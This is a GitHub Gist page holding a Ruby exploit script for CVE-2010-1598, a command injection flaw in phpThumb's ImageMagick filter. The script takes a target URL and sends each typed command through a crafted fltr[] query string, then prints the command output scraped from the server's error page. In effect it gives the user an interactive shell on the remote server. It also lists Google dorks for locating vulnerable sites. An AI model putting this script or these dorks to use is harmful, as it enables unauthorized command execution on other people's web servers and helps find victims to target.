Created
September 20, 2022 18:33
-
-
Save komodoooo/4b5d09e924418ea2654baee25905f851 to your computer and use it in GitHub Desktop.
CVE-2010-1598 exploit via "ImageMagick" extension.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'net/http' | |
| require 'cgi' | |
| puts """ | |
| CVE-2010-1598 | |
| PhpThumb OS command injection exploit\n | |
| by Komodo\n | |
| """ | |
| =begin | |
| Google dork to search vulnerable targets: | |
| inurl:phpThumb.php Deprecated: Function eregi() is deprecated in /home/ | |
| inurl:"/scripts/phpthumb" | |
| (most of this may not work) | |
| =end | |
| def main(target) | |
| payload = "?src=file.jpg&fltr[]=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;---;%20&phpThumbDebug=9" | |
| while true | |
| print "$ ";command = gets.chomp | |
| target.delete_suffix!("/") unless target[-1..-1] != "/" | |
| uwu = "#{target.chomp}/phpThumb.php"+payload.gsub("---", CGI.escape(command)) | |
| r = Net::HTTP.get_response(URI(uwu)) | |
| if r.code == "200" | |
| if r.body.include?("ImageMagick failed with message") | |
| begin | |
| puts "\n#{r.body.match(/ImageMagick failed with message(.*)sh: -quality: command not found/m)[1].strip.split('(')[1]}\n" | |
| rescue TypeError, NoMethodError | |
| puts "Null output" | |
| end | |
| else | |
| puts "Maybe the target is not vulnerable" | |
| end | |
| else | |
| puts r.code | |
| end | |
| end | |
| end | |
| begin | |
| print "Url: " | |
| main(gets.chomp) | |
| rescue => e | |
| puts e | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Unfortunately, most of the results indexed by google are no more vulnerable greet because the cve is relatively old.